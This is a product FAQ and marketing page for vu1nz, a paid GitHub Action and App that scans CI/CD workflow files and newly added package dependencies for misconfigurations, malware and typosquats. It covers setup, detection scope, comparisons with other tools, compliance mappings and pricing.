How do I scan my GitHub Actions and PR packages for malware?

Add the vu1nz reusable GitHub Action to any workflow: `uses: profullstack/vu1nz-gh-actions/.github/actions/vu1nz-actions-scan@v1`. On every push and PR it runs two scanners: 17 CI/CD workflow checks plus a malware/typosquat sweep of every newly added npm, pip, cargo, gem, go.mod, or composer package in the diff. It posts a PR comment and fails the build on high+ severity findings.

What does vu1nz detect that Dependabot does not?

Dependabot flags KNOWN CVEs in existing dependencies. vu1nz catches things Dependabot cannot: brand-new packages with no CVE yet, typosquats of popular packages, packages with malicious install scripts, low-reputation maintainers, sudden version-burst patterns (xz-utils style), and tainted package domains (Polyfill.io). Every major npm/PyPI compromise of the last three years had no CVE when it hit production.

How much does vu1nz cost?

$100 per month per GitHub org. Unlimited repos, unlimited scans, both scanners included. 14-day free trial on every new org with no credit card. Pay by card or crypto via CoinPay. The CLI is MIT-licensed and free forever for self-hosted use.

Does vu1nz send my source code anywhere?

The deterministic scanners run entirely inside your GitHub-hosted runner. Source code never leaves the runner. The optional Claude AI review sends only workflow YAML files (no source, no secrets) to Anthropic, and is opt-in by passing claude_api_key.

FAQ

Frequently asked questions.

Name: vu1nz
Author: vu1nz

Can't find what you're looking for? Email us.

Getting started

How long does it take to set up?: About 30 seconds. Click Install on the GitHub App page, select which repos to protect, and you're done. No workflow files, no secrets to manage. Every PR in those repos is now scanned automatically.
Do I need to add a YAML file to every repo?: No — that's the whole point of the GitHub App. Install once on your org and every repo is covered, including repos you create in the future. If you prefer the workflow-file approach, a 6-line YAML snippet is available on the Docs page.
Does it work on private repos?: Yes. The GitHub App uses a scoped installation token to read workflow files in private repos. No extra permissions are required.
Does it work for personal GitHub accounts (not orgs)?: Yes. A personal account counts as one "org" for billing purposes.

What it scans

What does the CI/CD scanner check?: 17 deterministic checks mapped to CWE: script injection via PR title/body/head ref, unpinned third-party actions (tag vs SHA), secrets interpolated directly into run: commands, pull_request_target misuse granting write access to untrusted code, overly permissive permissions blocks, and more.
What does the package scanner check?: When a PR adds a new package dependency (npm, pip, cargo, gem, go.mod, composer), vu1nz checks it against OSV.dev's real-time malware feed, runs a typosquat-distance check against the top 5k packages per ecosystem, inspects install scripts for curl-bash/base64-eval patterns, and flags packages published in the last 7 days from low-reputation maintainers.
What does the code (SAST) scanner check?: 60+ checks across 12 categories: hardcoded secrets and API keys, SQL/command/LDAP injection, reflected and stored XSS, insecure auth patterns, broken crypto (MD5, SHA-1, ECB mode), deserialisation, SSRF, path traversal, open redirects, XXE, misconfigured frameworks, and sensitive data leakage.
Will it slow down my CI?: No. The deterministic scanners complete in under 5 seconds. The optional Claude AI review takes under a minute. Scans run in parallel with your existing jobs.
What gets sent to Claude?: Only the workflow YAML files and changed code snippets flagged by the deterministic scanners. No secrets, no environment variables, no source files unrelated to the findings. Claude review is entirely opt-in via your own Anthropic API key.

Comparisons

How does it compare to Dependabot?: Dependabot scans your existing dependencies for known CVEs. vu1nz scans new packages added in a PR diff — including packages that have no CVE yet but show malware signals — and scans your workflow files, which Dependabot doesn't touch at all.
How does it compare to GitHub CodeQL?: CodeQL scans your application source code. vu1nz scans the workflow YAML files that run your CI/CD and the new packages that enter your supply chain via PR — the two surfaces that every major breach since 2022 has exploited.
How does it compare to Snyk?: Snyk is a CVE database lookup plus some SAST. vu1nz focuses specifically on the supply-chain attack surface: CI/CD workflow misconfigurations and malicious new packages that have no CVE yet.

Compliance

Which compliance frameworks does vu1nz support?: vu1nz findings map directly to OWASP CI/CD Top 10, NIST SSDF (SP 800-218), SLSA supply-chain levels, and CWE. Every finding includes a CWE identifier so it can be referenced in audit evidence. The CI/CD checks cover the specific control categories auditors look for under SOC 2 CC7/CC8 (change management and risk mitigation) and PCI DSS 4.0 Requirement 6.3 (protecting web-facing apps and software supply chain).
Does vu1nz help with SOC 2?: Yes — indirectly. SOC 2 Type II requires evidence of controls around change management (CC8) and risk assessment (CC7). Automated PR-level scanning with a documented finding history is exactly the kind of continuous control evidence auditors want. Your scan history in the dashboard is exportable and can be referenced in your SOC 2 audit package.
Does it help with NIST SSDF or SLSA?: Yes. NIST SSDF (SP 800-218) explicitly calls for verifying third-party components (PW.4) and protecting the build environment (PO.5). vu1nz addresses both: the package scanner covers PW.4 (malware, typosquats, install-script risks) and the CI/CD scanner covers PO.5 (unpinned actions, script injection, overly permissive workflow tokens). SLSA Level 2+ requires pinned, verified build dependencies — our unpinned-action check flags exactly those gaps.
Does it help with PCI DSS 4.0?: Req 6.3.2 (inventory of bespoke and custom software) and 6.3.3 (all software protected from known vulnerabilities) are directly relevant. The SAST scanner covers 6.3.2/6.3.3 by catching injection, XSS, and insecure crypto in code. The package scanner covers the supply-chain angle of 6.3.3 — flagging malicious or vulnerable new dependencies before they reach a cardholder data environment.
Does it address OWASP CI/CD Top 10?: All 10 categories are covered. CICD-SEC-1 (insufficient flow control) and CICD-SEC-3 (dependency chain abuse) are the highest-value checks — both are in the default scan. Findings include the OWASP category reference alongside the CWE so you can cross-reference your security posture report directly.
Can I export scan results for an audit?: Yes. Every scan is saved to your dashboard history with full finding detail, timestamps, repo, PR number, and severity breakdown. Contact sales@vu1nz.com for bulk CSV export or webhook-to-SIEM integration on the enterprise plan.
Does vu1nz store my source code?: No. The GitHub App reads workflow YAML files and PR diffs via the GitHub API during a scan and does not persist source code. Only the scan results (findings, severity counts, repo name, timestamp) are stored in your dashboard. See our privacy contact at sales@vu1nz.com for a data processing agreement (DPA) if required by your compliance programme.

Billing & account

Is there a free trial?: Yes. 14 days per GitHub org, no credit card required.
How much does it cost after the trial?: $100/month per GitHub org, flat. One team of 200 engineers with 50 repos costs the same as a team of 5 with 2 repos.
What payment methods are accepted?: Credit/debit card or crypto via CoinPay. Email sales@vu1nz.com for annual invoicing.
Can I cancel anytime?: Yes. Cancel before your next billing date and you won't be charged again. Your scans keep running for the remainder of the paid period.
Is the CLI free?: The vu1nz CLI scanner is MIT-licensed and free forever. You can run it locally, in your own CI, or self-host it. The GitHub App, hosted dashboard, and scan history are the paid parts.

Start free trial See pricing